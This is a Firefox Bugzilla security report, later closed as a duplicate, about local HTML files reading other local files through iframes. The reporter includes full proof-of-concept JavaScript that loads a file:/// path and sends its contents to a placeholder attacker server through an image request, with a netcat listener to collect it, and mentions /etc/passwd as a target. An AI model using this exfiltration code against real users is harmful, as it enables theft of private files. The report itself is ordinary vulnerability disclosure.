Closed
Bug 1412211
Opened 6 years ago
Closed 6 years ago
Allowed permission to iframe element will let attackers read sensitive files[Mozilla Firefox v56.0.2(64-bit)]
Categories
(Firefox :: Untriaged, defect)
Firefox
Untriaged
Tracking
()
RESOLVED
DUPLICATE
of bug 803143
People
(Reporter: nayakchinmohan, Unassigned)
Details
Attachments
(1 file, 1 obsolete file)
|
283.42 KB,
application/pdf
|
Details |
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38
Steps to reproduce:
Exploit code
The exploit code is very simple.
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<html>
<body>
<script>
<!-- Dynamically creating an iframe (important part is the onload attribute while will send the innerHTML content to the receive()). Change the file path below. -->
(function () {
document.body.innerHTML='<html><body><center><h1>Testing </h1></center></body></html>';
var profileIframe = document.createElement('iframe');
profileIframe.setAttribute('src', 'file:///C:/Users/chinmohan/Desktop/openvas.txt');
profileIframe.setAttribute('id', 'pi');
profileIframe.setAttribute("onload", "receive(document.getElementById('pi').contentWindow.document.body.innerHTML)");
document.body.appendChild(profileIframe);
})();
<!-- Dynamically creating an img element which will send the content to my server. Change the IP address and Port number below -->
function receive(text) {
console.log(text);
var profileIframe = document.createElement('img');
profileIframe.setAttribute('src', 'http://<ip address>:<port number>/collect.gif?content='+text);
document.body.appendChild(profileIframe);
}
</script>
</body></html>
Steps to Reproduce-
1. Copy a .HTML file on Desktop. Copy the above exploit code and paste it in the file.
2. Setup a netcat listener in your server
3. Open the file using a Firefox browser v56.0.2 (64-bit)
4. The screenshot of netcat listener is below
Actual results:
I was able to exfiltrate the files in the local filesystem.
Expected results:
This vulnerability is fixed in most other versions and return the error called “Error: Permission denied to access property "x". Please check the attached file for detailed report.
|
Reporter | |
Comment 1•6 years ago
|
||
I have also tested this on Mac OS Sierra. Version 10.12.6
|
|
Reporter | |
Comment 2•6 years ago
|
||
To evaluate the impact an attacker can exfiltrate /etc/passwd or other sensitive files
|
||
Comment 3•6 years ago
|
||
Converting this to PDF so it's more universally readable and windows folks don't have to risk bugs/attacks via MS Word. Round-tripped through Google Drive for the conversion so I can't guarantee the formatting was preserved.
Attachment #8922661 -
Attachment is obsolete: true
|
|
||
Comment 4•6 years ago
|
||
(In reply to Chinmohan Nayak from comment #2) > To evaluate the impact an attacker can exfiltrate /etc/passwd or other sensitive files I can't reproduce that, on old or newer versions of Firefox (as expected). There's no spec for file:/// behavior. For the first decade of the web or so each file was same-origin with every other file. That led to various attacks so browsers developed different heuristics to deal with the problem. blink- and webkit-based browsers are the most strict. IE blocks scripts by default, but if the user OKs the prompt and runs them they can still access every other file (I'm not sure what Edge does). Firefox allows files to access other files in the same directory or in sub directories, but not elsewhere (which protects important system files like /etc/passwd). In my testing on Mac and Windows 10 that is the behavior I get. Marking this a duplicate of the request to make our file handling stricter. If you think I've misunderstood your testcase please add a "needinfo" so I notice your comment.
Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Resolution: --- → DUPLICATE
|
|
||
Updated•3 years ago
|
Group: firefox-core-security
You need to log in
before you can comment on or make changes to this bug.
Description
•